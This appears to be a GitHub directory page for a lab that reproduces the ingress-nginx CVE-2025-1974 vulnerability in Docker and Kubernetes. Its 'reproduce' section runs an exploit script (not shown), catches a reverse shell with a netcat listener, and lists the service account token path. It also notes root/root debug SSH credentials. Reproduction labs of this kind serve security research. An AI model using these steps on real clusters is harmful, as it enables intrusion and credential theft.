Name	Name	Last commit message	Last commit date
parent directory ..
.env	.env
Dockerfile	Dockerfile
README.md	README.md
build.sh	build.sh
docker-compose.kvm.yml	docker-compose.kvm.yml
docker-compose.swr-mirror.yml	docker-compose.swr-mirror.yml
docker-compose.yml	docker-compose.yml
kubeconfig	kubeconfig
scp	scp
ssh	ssh

Name

Last commit message

Last commit date

docker-compose.kvm.yml

docker-compose.swr-mirror.yml

ingress-nginx CVE-2025-1974

dqd:
- ssst0n3/docker_archive:cve-2025-1974 -> ssst0n3/docker_archive:cve-2025-1974_v0.1.0
- ssst0n3/docker_archive:cve-2025-1974_v0.1.0
ctr:
- ssst0n3/docker_archive:ctr_cve-2025-1974 -> ssst0n3/docker_archive:ctr_cve-2025-1974_v0.1.0
- ssst0n3/docker_archive:ctr_cve-2025-1974_v0.1.0

usage

$ cd vul/CVE-2025-1974
$ docker compose -f docker-compose.yml -f docker-compose.kvm.yml up -d
$ kubectl --kubeconfig=kubeconfig get pods -n ingress-nginx                                             
NAME                                       READY   STATUS      RESTARTS      AGE
ingress-nginx-admission-create-7dj2s       0/1     Completed   0             4h37m
ingress-nginx-admission-patch-jzwpx        0/1     Completed   0             4h37m
ingress-nginx-controller-9456df685-9rlkg   1/1     Running     1 (43m ago)   4h37m
$ kubectl --kubeconfig=kubeconfig get services -n ingress-nginx
NAME                                 TYPE           CLUSTER-IP      EXTERNAL-IP   PORT(S)                      AGE
ingress-nginx-controller             LoadBalancer   10.96.110.135   <pending>     80:30534/TCP,443:30705/TCP   4h37m
ingress-nginx-controller-admission   ClusterIP      10.96.70.181    <none>        443/TCP                      4h37m
$ kubectl --kubeconfig=kubeconfig describe service -n ingress-nginx ingress-nginx-controller-admission  
Name:              ingress-nginx-controller-admission
Namespace:         ingress-nginx
Labels:            app.kubernetes.io/component=controller
                   app.kubernetes.io/instance=ingress-nginx
                   app.kubernetes.io/name=ingress-nginx
                   app.kubernetes.io/part-of=ingress-nginx
                   app.kubernetes.io/version=1.11.3
Annotations:       <none>
Selector:          app.kubernetes.io/component=controller,app.kubernetes.io/instance=ingress-nginx,app.kubernetes.io/name=ingress-nginx
Type:              ClusterIP
IP Family Policy:  SingleStack
IP Families:       IPv4
IP:                10.96.70.181
IPs:               10.96.70.181
Port:              https-webhook  443/TCP
TargetPort:        webhook/TCP
Endpoints:         192.168.229.144:8443
Session Affinity:  None
Events:            <none>

reproduce

kubectl --kubeconfig=kubeconfig port-forward -n ingress-nginx svc/ingress-nginx-controller 8080:80 &
kubectl --kubeconfig=kubeconfig port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443 &

python3 exploit.py

$ nc -nlvp 2333
listening on [any] 2333 ...
connect to [172.17.0.1] from (UNKNOWN) [172.23.0.2] 52236
ls -lah /var/run/secrets/kubernetes.io/serviceaccount/token
lrwxrwxrwx    1 root     root          12 Mar 29 03:53 /var/run/secrets/kubernetes.io/serviceaccount/token -> ..data/token

build

make all DIR=vul/cve-2025-1974

for developers

FROM ssst0n3/docker_archive:ctr_cve-2025-1974_v0.1.0
...
RUN --security=insecure ["/sbin/init", "--log-target=kmsg"]

use dmesg -w to see build logs.
use systemd service to execute commands
ssh root/root 10.0.2.17 to debug

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

ingress-nginx CVE-2025-1974

usage

reproduce

build

for developers

FilesExpand file tree

cve-2025-1974

Directory actions

More options

Directory actions

More options

Latest commit

History

cve-2025-1974

Folders and files

parent directory

README.md

ingress-nginx CVE-2025-1974

usage

reproduce

build

for developers